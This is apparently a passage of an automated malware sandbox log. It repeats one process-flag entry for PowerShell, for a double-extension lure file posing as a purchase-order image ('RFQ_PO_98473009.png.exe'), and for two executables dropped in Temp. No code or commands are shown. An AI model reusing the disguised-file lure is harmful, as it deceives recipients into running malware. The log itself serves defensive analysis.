                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess information set: NOOPENFILEERRORBOX
